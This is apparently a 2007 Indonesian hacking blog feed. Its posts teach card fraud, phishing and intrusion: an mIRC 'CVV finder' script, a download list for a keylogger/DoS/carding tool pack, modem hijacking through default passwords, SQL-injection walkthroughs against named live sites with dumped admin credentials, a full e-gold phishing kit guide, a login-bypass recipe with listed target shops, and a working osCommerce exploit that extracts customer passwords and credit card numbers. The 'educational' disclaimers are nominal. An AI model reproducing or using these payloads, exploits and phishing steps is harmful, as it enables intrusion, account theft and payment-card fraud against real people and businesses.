} alias cvv2 dialog -m cvv2 cvv2 dialog cvv2 { title “CVV Finder by LeNK” size -1 -1 250 145 box “Enjoy..!!”,2, 4 4 242 110 text “Masukan No CC Yang akan di cari CVV-nya”,4, 1 30 249 25, center edit “”,5, 55 57 140 20 ,autohs button “&Cari..!!!”,3, 80 85 100 20,defult,ok text “Email : l3nk@walla.com “,7, 1 120 249 25, center,disable } on 1:dialog:cvv2:*:*: { if ($devent == sclick) { if ($did == 3) { .set %cc $did(5) .timer 1 1 cekcvv2 } } }

jika sudah, klik OK.
nah cara makenya, klik kanan di layar irc dan akan ada pilihan cari cvv pada bagian bawah. masukkan no kartu kreditnya, dan dapatilah hasilnya…

CD Hacking Tools 2007 - Gratis

noreply@blogger.com (gresikblog) — Thu, 01 Nov 2007 03:38:00 +0000

XxxPass-Team 2007
Danger Cracking & Hacking Tools - Ver 1.0

- Exploit Collection (4 Tools)
- Google Hacking (4 Tools)
- Keyloggers (5 Tools)
- Binder & Packer (15 Tools)
- Flood_DOS (20 Tools)
- Messenger (11 Tools)
- Bruter (9 Tools)
- Anonimity (1 Tool)
- !!! $$$ !!! (13 Tools)
- AIO

Exploit Collection

1. 10377 Exploit
2. SMF ShoutBox Xss & HTML Injection
3. SMF Ultimate Shoutbox Cookie Disclosure Exploit
4. Firefox_BuG

Messenger

1. MSN Extreme 3.0
2. MSN Spy Lite v1.0
3. Yahoo Hack!
4. Hotmail Email Hacker
5. Hotmail Hacker Gold
6. HotmailHack
7. YahooUltraCracker
8. winks,moods,mugins,weemees and meegos + Installer
9. MSN Messenger Account Cracker v2.0
10. SH Yahoo Pass Sender 1.1
11. Yahoo Password Decoder

Google Hacking

1. Alt GooGle
2. Google Version 1.2
3. Google H4ck3r (3 programs)
4. GooLink

Keyloggers

1. Elgolf 1.0 Beta
2. ESK KeyLogger
3. Glog Keylogger
4. HermanAgent
5. IKlogger0.1

Bbruter

1. WebCrack v4.0
2. Brutus
3. Crack FTP
4. FTP Brute Hacker
5. phpbb bruteforcer
6. PhpBB Pass Extractor
7. phpBB Cracker
8. Email Cracker
9. FTP Brute Forcer

!!! $$$ !!!

1. Cmaster
2. CC Verify
3. CWizard
4. THCC
5. Visa Card Generator 06
6. Carcabot_Mass_Email
7. CcHack
8. CC-Fake
9. cvv2c
10. DesertCVV2
11. id-fake
12. Paypal-Link-Spoofed
13. HoW to get Credit Cards Fresh and Fastest

AIO

1. Uploader for All
2. Cool Small Usefull Dp

Flood DOS

1. Flowbabeflow
2. FreeSiteKiller V 2.01
3. Webxgrab
4. Web Attacker ENG
5. TheRapist-Dos Attacker
6. HybridFlood2
7. Ati-russ 3.0
8. Http Bomber v1.001b
9. Sprut
10. DoS_5
11. etherflood
12. DoSAttacker
13. phpBB Dos
14. phpBB Attacker
15. Ping Attack
16. Site Nuke
17. Divine Intervention
18. UC Forum Spammer
19. Inferno Nuker
20. Multiple Site Flood

Silahkan di download di :

http://rapidshare.com/files/24341192/XxxPass-C_H_Ver1.0-_2007-part1.rar.html
http://rapidshare.com/files/24350769/XxxPass-C_H_Ver1.0-_2007-part2.rar.html
Pass : XxxPass_DJ_haselking

Hack ... hack ... hack the World !! :D
( Just for lamerz ) Ref:

Hacking Modem Speedy dan Penanganannya

noreply@blogger.com (gresikblog) — Thu, 01 Nov 2007 03:34:00 +0000

Hacking Modem Speedy dan Penanganannya

Sebenarnya sudah lama sekali telkom mengadakan diskon besar-besaran untuk meraih pelanggan sebanyak-banyaknya. Udah dulu promosinya. :D

Sama dengan bug-bug yang lainnya, konfigurasi default akan membuat pihak luar yang tidak diinginkan seperti cracker dengan mudah mengeksploitasi secara besar-besaran sehingga memanen username dan password menjadi sesuatu yang memungkinkan sekali untuk dilakukan. Contoh bug yang buruk, yaitu username default dan password yang default.

Sebelum ngejabarin masalah teknisnya, berikut alat-alat yang diperlukan :

Browser Internet ( mau yang banyak bugnya, maupun yang sedikit bugnya )

Website dengan log system flat file ( diambil dari artikelnya Anggi J. )

Aplikasi Instant Messaging, ex : Yahoo Messenger ( Social Engineering )

Internet Password Asterisk Reveal

( http://www.nsauditor.com/freeware/downloads/IEAstRecover.exe )

Langkah Pertama

Silahkan anda baca artikel http://www.ilmuwebsite.com/detil_php_tutorial/2/_Membuat_System_LOG_dengan_FLAT_FILE/
, cara memasang log system flat file. Digunakan untuk mendapatkan alamat ip dari sang korban.

Langkah Ke Dua

Inti dari artikel ini adalah pencarian user yang akan dijadikan korban. Anda bisa menggunakan aplikasi IRC ataupun instant messaging yang lainnya. Alangkah baiknya anda menggunakan aplikasi IRC, seperti mIRC ataupun yang lainnya, karena fasilitas whois yang ada didalamnya mempermudah kita untuk segera mengetahui IP sang korban, tapi pada beberapa kasus, adakalanya user yang advanced menggunakan anonymous proxy yang tentunya menyembunyikan IP asli miliknya. Sehingga perlu teknik social engineering yang lebih ampuh lagi. Berikut ada sedikit percakapan antara seseorang sebagai intruder dengan sang korban menggunakan aplikasi yahoo messenger :

Mamang (intruder) : dah liat situs ini belom, ilmuwebsite.com ???

Sang_korban : apaan tuh ?

Mamang (intruder ) : situs keren punya orang keren, ngebahas tentang berbagai artikel mengenai kekerenan. Coba deh liat.

Sang_korban : coba, gw liat dulu. # kena!!

Mamang ) intruder ) : gimana keren kan ? eh, gw off dulu yah. C U

Situs ilmuwebsite.com tersebut, merupakan sebuah contoh situs yang anda gunakan untuk merecord ip sang korban. Anda bisa memasang log system flat file pada situs milik anda. Dengan mengusahakan sang korban tertarik untuk mengunjungi situs yang telah dipasang log system flat file.

Contoh IP yang sudah dilog dalam flat file,

Langkah Ketiga

Setelah mendapatkan alamat ip sang korban, yang perlu anda lakukan adalah membuka browser, kemudian pada address bar isi dengan alamat ip yang telah anda dapatkan, sebagai contoh yang saya dapatkan adalah http://125.160.#.# isikan username dengan admin dan passwordnya admin. Jika anda beruntung, anda akan langsung dihadapkan kepada halaman username ADSL dan tentunya password yang asterisk. Untuk membuka password yang asterisk, anda cukup menggunakan Internet Password Asterisk Reveal.

Penanganan

Sebenarnya dengan mengganti password yang default pun itu sudah bisa mencegah teknik seperti ini. Dan intinya password yang kuatlah yang susah untuk dimanfaatkan. Password yang kuat ini memiliki lebih dari 8 digit, dan merupakan gabungan dari angka huruf dan special character. Ex: ilmVw3851te --> bentuk lain dari ilmuwebsite

Sayangnya, telkom telah menerapkan system yang unique, sehingga account speedy tidak bisa digunakan pada jaringan telepon yang berbeda. Dan tentunya anda tidak bisa men-take over account yang sudah didapatkan. Mohon Maaf, artikel ini hanya sebagai contoh pembelajaran.

Default password untuk setiap modem :

http://www.elitehackers.info/defaultpasslist.php

SQL Injection

noreply@blogger.com (gresikblog) — Thu, 01 Nov 2007 03:31:00 +0000

SQL Injection
By k0il

SQL Injection AJ Auction seluruh versi SQL Injection pada Aj Auction untuk seluruh versi. =============================================================

Lagi-lagi bug baru di temukan, kali ini Al-k akan coba masuk sebagai admin pada situs yang memiliki bug pada halaman subcat.php

langsung aja buka google-nya ... masukkan keyword ini inurl:/subcat.php?cate_id= nah loh, dapet banyak bangett ... pilih aja salah satunya

contoh : http://www.estoop.it/subcat.php?cate_id=146&view=list&PHPSESSID=27c9b2b6500f2c01c09eda1978d45096 setelah cate_id=

di hapus aja kemudian di ganti dengan

-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,117,114,107,101,121,112,97,115,115,58),pas sword),2%20from%20admin/*&view=list

kira kira jadi begini

http://www.estoop.it/subcat.php?cate_id=-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,11 7,114,107,101,121,112,97,115,115,58),password),2%20from%20admin/*&view=list

nah loh passwordnya langsung dapet

turkey:adminturkeypass:daniel87 itu artinya usernamenya admin passwordnya daniel87 sekarang masuk ke control panelnya

http://www.estoop.it/admin terus masukkin username dan passwordnya jreng jreng jreng anda di bawa ke control panel

Tutorial phising e-gold account

noreply@blogger.com (gresikblog) — Thu, 01 Nov 2007 03:29:00 +0000

Tutorial phising e-gold account
By th3sn0wbr4in

Bila anda bingung dengan judul di atas, mungkin anda lebih familiar dengan kata-kata berikut : "Tutorial mencuri e-gold", "Tutorial hack e-gold". Tapi, saya sendiri kurang suka dengan kata-kata hack e-gold, karena terdengar kurang pantas saja bila menggunakan kata hack. Di tutorial ini, kita akan membuat situs e-gold yang palsu, dan kemudian mengundang para korban untuk login ke situs e-gold palsu milik kita sehingga semua data yang di-input oleh sang korban akan dikirim ke e-mail kita. Tutorial ini diutamakan untuk pemula, yang medium dan advanced -pun boleh membacanya walau hanya untuk sekedar menghabiskan waktu atau sekedar memaki tutorial ini (*atau penulisnya). Tutorial ini hanyalah sebagai pengetahuan semata, segala kerugian yang diakibatkan oleh artikel ini, bukan tanggung jawab penulis.
Hal-hal yang harus dipersiapkan kurang lebih sebagai berikut :

- Web Hosting / Host / PHP Shell / cPanel atau istilah lainnya yang mendukung PHP.
Banyak orang di luar sana yang menggunakan istilah demikian, cpanel, host, php shell atau apalah. Intinya yang kita butuhkan adalah sebuah web hosting dengan dukungan php. Beruntunglah bagi anda yang sering bermain-main dengan php shell, atau mungkin mengutak-atik web sendiri. Karena anda tidak perlu bersusah payah untuk menempatkan situs e-gold anda nantinya atau bila masih kesulitan, setidaknya tahu bagaimana cara mendapatkannya. Namun, jika anda yang masih kesulitan dan belum mengerti bagaimana untuk mendapatkan web hosting sebagai tempat situs e-gold palsu, sepertinya anda harus sedikit bekerja keras untuk mendapatkannya, bisa meminta, berusaha mencari sendiri, atau bagaimanalah. Tapi yang jelas, saya tidak akan memberitahu caranya secara detail di sini, karena sudah banyak situs-situs berbahasa indonesia yang menyediakan cara untuk mendapatkan php shell, cpanel dsb. Atau, anda bisa juga menggunakan CC (Credit Card) untuk memesan web host secara online. Atau cara lain ? Silahkan berfantasi dengan kreativitas anda. Dan jangan lupa, yang terpenting adalah mendukung PHP dan bisa digunakan untuk mengirim e-mail.
Nah, untuk menjebak korban masuk ke dalam lubang jebakan sudah dimulai. Lubang jebakannya sudah disiapkan, lalu ?

- E-gold scampage
Agar korban mau masuk ke dalam lubang jebakan yang kita buat, kita harus membuat lubang jebakan tersebut tidak terlihat seperti lubang jebakan, namun terlihat biasa saja. Kira-kira seperti itulah fungsi scampage ini, dan menurut pendapat pribadi scampage adalah duplikat dari situs asli dan mengedit beberapa bagian sesuai kebutuhan/penipuan atau simple-nya duplikasi situs untuk menipu. Scampage ini merupakan scampage bikinan saya sendiri (*makanya jelek), yang merupakan komposisi dari, situs asli www.e-gold.com, dan menggunakan beberapa campuran script dari scampage yang dibuat oleh phiser lain, namun tidak di-update sehingga tampilannya tidak lagi terlihat seperti situs asli.
Download e-gold scampage di :
http://geocities.com/th3sn0wbr4in/egoldscampage.zip
Setelah anda men-download egoldscampage.zip ke komputer anda, extract file egoldscampage.zip dan edit file login.php dan login1.php yang terletak di folder www.egold.comacct.
Pada bagian $to = "your@e-mail.com"; ganti your@e-mail.com dengan e-mail anda yang nanti akan digunakan untuk menampung accountID + password e-gold dari korban-korban anda. Begitu juga pada file login1.php, ganti your@e-mail.com dengan e-mail anda yang nanti akan digunakan untuk menampung e-mail + password si korban.
Simpan semua perubahan yang sudah anda lakukan, dan sekarang upload file egoldscampage.zip ke Web Hosting yang sudah anda siapkan sebelumnya dan extract file egoldscampage.zip di Web hosting anda.

- E-mail palsu
Anda memasuki zona terlarang!!! Lewat sini agar anda selamat - TTD, Warga Sekitar. Kira-kira seperti itulah papan yang terpampang ketika anda sedang melewati daerah asing. Orang yang belum mengenal betul daerah tersebut, pasti akan mengikuti petunjuk jalan yang diberikan, apalagi ada tanda bahwa informasi ini berasal dari orang sekitar. Bagi yang panik, tentu mereka tidak lagi berpikir panjang dan langsung mengikuti petunjuk yang ada, sehingga mereka terjebak ke dalam lubang yang kita buat.
Kurang lebih, begitulah fungsi si 'e-mail palsu'. Berikut ini adalah dua buah e-mail palsu yang mungkin bisa anda gunakan.
http://geocities.com/th3sn0wbr4in/gold-letter-1.txt
http://geocities.com/th3sn0wbr4in/gold-letter-2.txt

Untuk gold-letter-1.txt, ada bagian yang harus anda ubah sebelum e-mail tersebut dikirimkan ke korban.

Please update your records on or before October 5th, 2007.

Ganti October 5th, 2007 dengan tanggal 3-5 hari kemudian ketika anda mengirimkan e-mail palsu. Misalnya, anda mengirim e-mail tersebut pada tanggal 1 October 2007, anda ganti menjadi 3-5 hari ke depan sebagai tenggang waktu untuk sang korban.
Pada gold-letter tersebut, ada 4 bagian yaitu : From, Name, Subject, dan Message. Keempat-nya ini akan digunakan pada Inbox Mailer nanti. Jika anda ingin melihat preview e-mail tersebut, copy-paste Message dari letter tersebut ke notepad, dan save sebagai file html. Di setiap e-mail tersebut, terdapat sebuah link yang akan mengarahkan korban ke situs e-gold milik anda.
Contoh pada gold-letter-1.txt, jika anda melihat preview dari e-mail tersebut, isinya adalah demikian :

To update your E-gold records click on the following link:

https://www.e-gold.com/acct/login.html

Namun, bila anda melihat html code-nya, isinya adalah demikian :

To update your E-gold records click on the following link:

https://www.e-gold.com/acct/login.html

Jadi, link https://www.e-gold.com/acct/login.html sebenarnya mengarah ke http://www.modelbc.de/administrator/modules/www.e-gold.com/acct/login.html yang merupakan 'lubang jebakan' milik th3sn0wbr4in. Ganti http://www.modelbc.de/administrator/modules/www.e-gold.com/acct/login.html dengan alamat situs e-gold milik anda sendiri yang sudah anda persiapkan.

Berikut ini, contoh e-mail gold-letter-1 di inbox yahoo milik saya
http://i189.photobucket.com/albums/z55/ianis01/contentmailno4.png

- PHP Inbox Mass Mailer
Sayangnya, kedua gold-letter tersebut barulah desain. Selama e-mail tersebut masih berada di komputer lokal, tidak ada korban yang bisa melihatnya sehingga tidak satupun terjebak masuk ke dalam jebakan yang sudah anda siapkan. Agar 'para korban' melihat e-mail tersebut, anda harus mengirimkan e-mail ke korban.
Dan bila anda ingin korban anda 'melihat' e-mail tersebut, e-mail anda harus tiba di Inbox sang korban, bukan Bulk, Spam, Junk atau istilah lainnya, karena jarang korban yang mau melihat e-mail yang tiba di kategori-kategori tersebut (Bulk, Spam, Junk, etc) walaupun memang ada, tapi tidak banyak.
Karena itu, anda harus menggunakan PHP Inbox Mass Mailer, merupakan sebuah script PHP yang digunakan untuk mengirimkan e-mail secara massal ke korban.
Contoh tampilannya adalah sebagai berikut :
http://i189.photobucket.com/albums/z55/ianis01/mailergl3.png
Isi field Your Email, Your Name, Subject, dan Message seperti yang tertera pada gold-letter-1 atau gold-letter-2, tapi isi dengan gold-letter yang sudah anda edit.
Script php inbox mass mailer :
http://geocities.com/th3sn0wbr4in/mailer.txt
http://geocities.com/th3sn0wbr4in/mailer.arif.txt
Untuk script mailer.arif.txt, didapat dari teman yang original link-nya adalah
http://geocities.com/aliif_1604/run.txt

Agar anda bisa menggunakan PHP Inbox Mass Mailer, anda harus meng-upload-nya ke Web Hosting yang mendukung PHP dan mengirim mail. Sekarang bagaimana caranya agar e-mail tersebut masuk inbox, itu tergantung pada Web Hosting tempat anda meng-upload script mailer-nya. Tidak semua host yang bisa mengirim mail tapi tiba di inbox. Apalagi, kita menggunakan AccountRobot_donotreply@e-gold.com sebagai e-mail pengirim. Bagaimana caranya mengetahui apakah host bisa mengirim e-mail dan tiba di inbox ? Cukup upload script mailer, dan coba anda kirim ke e-mail anda sendiri. Apabila anda mendapatkan e-mail palsu anda tiba di inbox, berarti host tersebut layak digunakan untuk mengirim e-mail e-mail palsu ke korban. Pengalaman pribadi saya sendiri, bagian inilah yang paling sulit. Sejak beberapa tahun yang lalu saya sudah menyiapkan semua yang saya butuhkan untuk membuat jebakan ini, tapi selalu terhenti karena belum juga mendapatkan host yang layak untuk mengirimkan e-mail palsu ke korban. Awalnya saya pikir tidak mungkin mendapatkan host yang bisa mengubah alamat pengirim menjadi seperti AccountRobot_donotreply@e-gold.com. Tapi pada akhir tahun 2006, seorang teman yang memiliki Yahoo! ID tommyhacku memberikan saya sebuah host yang bisa melakukannya.
Jadi, selamat berjuang untuk mendapatkannya. Bila anda sudah mendapatkannya, saat-nya mengumpulkan daftar korban.

- E-mail list
Tentukan siapa korbanmu!!! Bagaimana mengetahui e-mail orang yang memiliki e-gold account?
- Cari dari forum-forum yang berbicara soal e-gold, paypal, atau business
- Cari dari situs-situs HYIP
Tapi sepertinya yang demikian itu cukup sulit. Jadi, kita tidak perlu e-mail yang mana yang mempunyai e-gold account. Masukkan saja semua daftar e-mail ke dalam field target di PHP Mailer. Beberapa cara yang bisa didapatkan untuk mendapatkan e-mail list :
- Beli lewat situs-situs yang menjualnya menggunakan CC. Anda bisa menggunakan keyword "buy e-mail leads" atau keyword lainnya lewat google. Silahkan dicoba-coba keyword lainnya.
- Menggunakan software e-mail extractor
Salah satu software yang terkenal untuk mengumpulkan e-mail adalah Tarantula.
Download software-nya di http://www.emailsmartz.com/downloads/tarantula.exe
Download Patch Tarantula di http://www.geocities.com/toemenggoeng/error/Patch-Tarantula-SG.zip
Jangan tanya saya untuk menggunakannya. Silahkan coba-coba sendiri

- Action!!!
Setelah semua siap, silahkan kirim e-mail palsu ke daftar korban lewat php mailer anda dan tunggu hasilnya di e-mail anda.

Secara simple, yang dibutuhkan adalah :
- Host, yang belum punya boleh nyoba http://modelbc.de/administrator/modules/index_page.php (c99 shell)
- Scampage, source : http://geocities.com/th3sn0wbr4in/egoldscampage.zip
- Mailer + Host utk Mailer, source : http://geocities.com/th3sn0wbr4in/mailer.txt
- Mail list

Tanya-Jawab :
Q:Saya upload scampage-nya ke PHP Shell tapi ber-platform windows, tapi koq error mulu?
A:Cari saja paltform UNIX

Q:Saya sudah menggunakan PHP Mailer yang bagus, tapi kenapa masih tidak masuk ke inbox saya?
A:Pada beberapa kasus, e-mail palsu tersebut tidak masuk ke inbox karena memang sudah di-block oleh penyedia layanan e-mail (Google, Yahoo!, etc), sehingga anda harus mengganti gold-letter. Edit saja beberapa bagian dari gold-letter dan coba lagi. Tapi semoga gold-letter yang saya berikan belum di-block oleh penyedia layanan e-mail, jika iya, anda harus mencoba cari yang lain.

Q:PHPMailer saya sudah masuk ke inbox, tapi beberapa setelah saya gunakan phpmailernya tdk bisa mengirim lagi, knp ya?
A:Jika sudah digunakan untuk mengirim e-mail palsu apalagi dengan daftar korban yang cukup banyak, mungkin host-nya sudah masuk ke dalam blacklist, jadi silahkan cari yang lain.

Q:Sudah dapat hasilnya, tapi informasi e-mail nya tidak ada, hanya login e-gold dan berhenti ketika e-gold meminta AccSent Pin, gimana?
A:Di e-mail yang berisi E-gold Account Login ada informasi IP Address dan Browser. Saya juga sering mendapatkan yang demikian, kemudian saya meminta tolong teman yang mempunyai proxy list yang cukup banyak sehingga proxy-nya bisa digunakan untuk mem-by-pass accsent pin request. YahooID-nya adalah : acer_pira
Semoga dia masih bisa membantu, tapi bila tidak, silahkan cari yang lain.

Cari nomor Kartu Kredit dengan Bug Digishop

noreply@blogger.com (gresikblog) — Thu, 01 Nov 2007 03:27:00 +0000

1–] Buka Google

2–] Ketik inurl:“/cart.php?m=” [atau kreasi lo sendiri]

3–] Pilih salah satu target misalnya :
http://uniquescrapbooks.com.au/store/cart.php?m=view.
hapus tulisan cart.php?m= dengan admin.
Jadinya http://uniquescrapbooks.com.au/store/admin
4–] Nanti akan muncul menu login.
Masukkan bug SQL Injection ini untuk Username dan Password
Pada Username dan Password, isi dengan ‘or”=”

_________________
Username :|_____’or”=”______|
_________________
Password :|_____’or”=”______|

5–] Klo berhasil, nanti akan muncul Main Menu dan silahkan cari CC nya. (udah sampe sini silahkan explorasi, jangan minta disuapin terus)
Liat yang pending orders karena CC nya masih ada, kalau di pending orders CC nya udah ga ada berarti lo udah keduluan orang, he…he…he…

6–] Klo yang muncul Invalid Username or Password, berarti SQL
Injection-nya udah ga mempan, he…he…he…silahkan cari
yang lain.

—==[ Tips : - Klo` Lo dapet yang Order-an nya masih sedikit, targetnya di simpen aja dulu, mungkin beberapa hari kemudian udah ada CC baru (alias ada yg shopping)
- Klo` dapet target bagus, jangan lupa bagi-bagi
ya, he…he…he…

GOOD LUCK !

—==[ Contoh Target ]==—

http://www.7footserb.com/shop/admin/

https://www.tangerineclothing.com/admin/

https://www.flagsbygm.com/store/admin/

https://www.facesbyfelicia.com/store/admin/

http://creativecaketoppers.com/admin/

Cari CC dari osCommerce

noreply@blogger.com (gresikblog) — Thu, 01 Nov 2007 02:55:00 +0000

Artikel ini hanya untuk pembelajaran saja untuk para webmaster. tidak ada yang berbahaya dalam artikel ini. Yang menjadikannya berbahaya adalah orang yang menggunakannya untuk kepentingan tidak baik saya tidak bertanggung jawab atas segala pengrusakan yang terjadi setelah anda membaca artikel ini

Cari CC dari osCommerceDapatkan CC Info dari bug osCommerce

————– Exploit Code ————-

#!/usr/bin/php -q -d short_open_tag=on

error_reporting(0);
ini_set(”max_execution_time”,0);
ini_set(”default_socket_timeout”,5);

if ($argc<5) {
echo ” Exploit osCommerce < 2.2 Milestone 2 060817 “;
echo ” Usage: php “.$argv[0].” host path product_id whatinfo OPTIONS “;
echo ” host - target server (ip/hostname) “;
echo ” path - path to osCommerce “;
echo ” product_id - Valid product_id “;
echo ” whatinfo - pass for password, cc for credit card info, addr for address “;
echo “Options: “;
echo ” -D: Show debug or verbose on “;
echo ” -p[port]: specify a port other than 80 “;
echo ” -P[ip:port]: specify a proxy “;
echo “Example: “;
echo ” php “.$argv[0].” localhost /os2/catalog/ 2 pass “;
echo ” php “.$argv[0].” 192.168.1.108 /os2/catalog/ 2 pass -p8080 -P192.168.1.108:3128 -D “;
echo ” php “.$argv[0].” 192.168.1.108 /os2/catalog/ 2 cc -p8080 -P192.168.1.108:3128 “;
die;
}

$host=$argv[1];
$path=$argv[2];
$products_id=$argv[3];
$whatinfo=$argv[4];
$port=80;
$Debug=0;
$proxy=”";
for ($i=5; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp==”-p”)
{
$port=str_replace(”-p”,”",$argv[$i]);
}
if ($temp==”-P”)
{
$proxy=str_replace(”-P”,”",$argv[$i]);
}
if ($temp==”-D”)
{
$tmp=str_replace(”-D”,”",$argv[$i]);
$Debug=1;
}
}

if (($path[0]<>´/´) or ($path[strlen($path)-1]<>´/´)) {echo ´Error… check the path!´; die;}

if($Debug==1) {
echo “Name : osCommerce Multiple Vulnerabilities “;
echo “Date : August 17, 2006 “;
echo “Vendor : osCommerce “;
echo “URL : http://www.oscommerce.com/ “;
echo “Version : osCommerce < 2.2 Milestone 2 060817 “;
echo “Risk : Multiple Vulnerabilities “;
echo “Exploit : Customers Info, Pass, and Credit Info Disclosure “;
echo “Author : Perseus “;
echo “Compatibility : magic_quotes_gpc off, union supported “;
echo “Greets : rgod, James Bercegay, str0ke, hdm, r57 “;
}

// try if you can rewrite this code to attack osc with magic_quotes_gpc on
// because I found it impossible for the moment.
// this will make oscommerce people update their vuln servers right now.

$proxy_regex = ´(d{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5})´;
if ($proxy==´´) {$p=$path;} else {$p=´http://´.$host.´:´.$port.$path;}
$loop = 1000;

fclose($ock);
#debug
#echo ” “.$html;
}
$bl=0;
for($y=0;$y<=$loop;$y++) {
//1. get cookie
$out = “GET “.$p.”product_info.php?products_id=”.$products_id.” HTTP/1.1 “;
$out .= “Host: “.$host.” “;
$out .= “Connection: Close “;
sendpacketii($out);
$e = explode(”Set-Cookie: osCsid=”,$html);
$e2 = explode(”;”,$e[1]);
$cookie = $e2[0];

//2. injection
if($whatinfo==”pass”) {

$sql=”999´ UNION SELECT 0 , CONCAT( CHAR(77),´||||´, customers_password, ´^´, customers_email_address,´|´,customers_firstname,´|´,customers_lastname,´|´,customers_dob,´|´,customers_telephone, ´^´) , 0 , 0
FROM customers LIMIT “.$y.”,1 /*”;

} elseif($whatinfo==”addr”) {

$sql=”999´ UNION SELECT 0 , CONCAT( CHAR(77),´||||´, entry_company, ´^´, entry_firstname,´|´,entry_lastname,´|´,entry_street_address,´|´,entry_suburb,´|´,entry_postcode,´|´,entry_city,´|´,entry_state, ´^´) , 0 , 0
FROM address_book LIMIT “.$y.”,1 /*”;

} elseif($whatinfo==”cc”) {

$sql=”999´ UNION SELECT 0 , CONCAT( CHAR(77),´||||´, cc_type, ´^´, cc_owner,´|´,cc_number,´|´,cc_expires,´|´,billing_street_address,´|´,billing_suburb,´|´,billing_city,´|´,billing_postcode,´|´,billing_state,´|´,billing_country,´^´) , 0 , 0
FROM orders LIMIT “.$y.”,1 /*”;

}

$sql=urlencode($sql);
$data = “id[0]=”.$sql.”";
$data.=”&products_id=”.$products_id.”";
$out = “POST “.$p.”product_info.php?products_id=”.$products_id.”&action=add_product&osCsid=”.$cookie.” HTTP/1.0 “;
$out .= “User-Agent: Googlebot/2.1 “;
$out .= “Host: “.$host.” “;
$out .= “Accept: text/plain “;
$out .= “Connection: Close “;
$out .= “Content-Type: application/x-www-form-urlencoded “;
$out .= “Cookie: “.$cookie.” “;
$out .= “Content-Length: “.strlen($data).” “;
$out .= $data;
sendpacketii($out);

//3. get vals
$out = “GET “.$p.”shopping_cart.php?osCsid=”.$cookie.” HTTP/1.1 “;
$out .= “Host: “.$host.” “;
$out .= “Connection: Close “;
sendpacketii($out);
//echo $html;
$e = explode(”M||||”,$html);
$e2 = explode(”^”,$e[1]);
$str = ” “.$y.”. “.$e2[0].” “.$e2[1].” “;
echo $str;
$strl = strlen($str);
if($strl<=25) $bl++;
if($bl==3) break;

}

——- End Code ———–

SQL Injection

noreply@blogger.com (gresikblog) — Thu, 01 Nov 2007 01:16:00 +0000

/*********************************************************
* SQL Injection, step by step.
*
* No Warranty. This tutorial is for educational use only,
* commercial use is prohibited.
*
**********************************************************/

Akhir-akhir ini, anda sering mendengar istilah "SQL Injection" ?
Anda tahu betapa berbahaya bug yang satu ini ?
Berikut akan kita sajikan step by step SQL Injection ini.
Catatan : kita akan membatasi bahasan pada SQL Injection
di MS-SQL Server.

Kita akan mengambil contoh di site www.pln-wilkaltim.co.id
Ada dua kelemahan di site ini, yaitu:
1. Tabel News
2. Tabel Admin

Langkah pertama, kita tentukan lubang mana yang bisa di-inject
dengan jalan berjalan-jalan (enumeration) dulu di site tsb.
Kita akan menemukan 2 model cara input parameter, yaitu dengan
cara memasukkan lewat input box dan memasukkannya lewat
alamat URL.

Kita ambil yang termudah dulu, dengan cara input box.
Kemudian kita cari kotak login yang untuk admin.
Ketemu di www.pln-wilkaltim.co.id/sipm/admin/admin.asp
Langkah pertama untuk menentukan nama tabel dan fieldnya,
kita inject kotak NIP dengan perintah (password terserah, cabang
biarkan aja):
' having 1=1--
jangan lupa untuk menuliskan tanda kutip tunggal dan tanda
minus dobel (penting).
Arti kedua tanda tsb bisa anda cari di tutorial SQL Injection
di www.neoteker.or.id ini (lihat arsip sebelumnya).
Kemudian akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NOMOR' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Keluarlah nama field pertama kita !!!
Catat nama tabel : T_ADMIN
Catat nama field : NOMOR

Kemudian kita akan mencari nama field-field berikutnya,
beserta nama tabel yang mungkin berbeda-beda.
Kita inject di kotak NIP (password terserah):
' group by T_ADMIN.NOMOR having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NIP' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya itulah nama tabel dan field kedua kita.
Catat : T_ADMIN.NIP

Kemudian kita cari field ke tiga :
' group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.PASSWORD' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Catat field ke tiga : T_ADMIN.PASSWORD

Lakukan langkah di atas sampai kita menemukan field terakhir.

Berikut adalah pesan error yang terjadi, jika kita mengecek
field terakhir dengan meng-inject:
' group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL
having 1=1--
(catatan : kalimat harus 1 baris, tidak dipotong)
--------------------
- NIP atau Password atau Unit Anda salah !! -
--------------------
Sukses !!! Kita berhasil menemukan field terakhir.
Daftar kolom (field):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL
Hanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN),
ini akan mempermudah proses kita selanjutnya.

Langkah berikutnya, kita menentukan jenis struktur field-
field tersebut di atas.

Kita inject di kotak NIP (pass terserah) :
' union select sum(NOMOR) from T_ADMIN--
Arti dari query tersebut adalah : kita coba menerapkan
klausa sum sebelum menentukan apakah jumlah kolom-kolom
di dua rowsets adalah sejenis.
Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah)
yang berlaku untuk type kolom numerik, jadi untuk type kolom
yang bukan numerik, akan keluar error yang bisa memberitahu
kita jenis kolom yang dimaksud.
Pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries
in an SQL statement containing a UNION operator must have
